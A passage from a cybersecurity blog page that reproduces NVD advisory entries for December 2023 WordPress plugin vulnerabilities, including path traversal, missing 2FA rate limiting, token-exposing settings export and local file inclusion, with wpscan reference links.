IThe Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 does not validate user input used in a path, which could allow users with an admin role to perform path traversal attacks

CVE ID : CVE-2023-6222
Source : contact@wpscan.com
CVSS Score : /

References :
https://drive.google.com/file/d/1krgHH2NvVFr93VpErLkOjDV3L6M5yIA1/view?usp=sharing | source : contact@wpscan.com
https://wpscan.com/vulnerability/df892e99-c0f6-42b8-a834-fc55d1bde130 | source : contact@wpscan.com


Vulnerability ID : CVE-2023-6272

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
The Theme My Login 2FA WordPress plugin before 1.2 does not rate limit 2FA validation attempts, which may allow an attacker to brute-force all possibilities, which shouldn't be too long, as the 2FA codes are 6 digits.

CVE ID : CVE-2023-6272
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/a03243ea-fee7-46e4-8037-a228afc5297a | source : contact@wpscan.com


Vulnerability ID : CVE-2023-6289

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
The Swift Performance Lite WordPress plugin before 2.3.6.15 does not prevent users from exporting the plugin's settings, which may include sensitive information such as Cloudflare API tokens.

CVE ID : CVE-2023-6289
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/8c83dd57-9291-4dfc-846d-5ad47534e2ad | source : contact@wpscan.com


Vulnerability ID : CVE-2023-6295

First published on : 18-12-2023 20:15:09
Last modified on : 18-12-2023 20:21:38

Description :
The SiteOrigin Widgets Bundle WordPress plugin before 1.51.0 does not validate user input before using it to generate paths passed to include function/s, allowing users with the administrator role to perform LFI attacks in the context of Multisite WordPress sites.

CVE ID : CVE-2023-6295
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/adc9ed9f-55b4-43a9-a79d-c7120764f47c | source : contact@wpscan.com


This website uses the NVD API, but is not approved or certified by it.

About the author
Julien B.

Securitricks

Up-to-Date Cybersecurity Insights & Malware Reports

Securitricks

Great! You’ve successfully signed up.

Welcome back! You've successfully signed in.

You've successfully subscribed to Securitricks.

Success! Check your email for magic link to sign-in.

Success! Your billing info has been updated.

Your billing was not updated.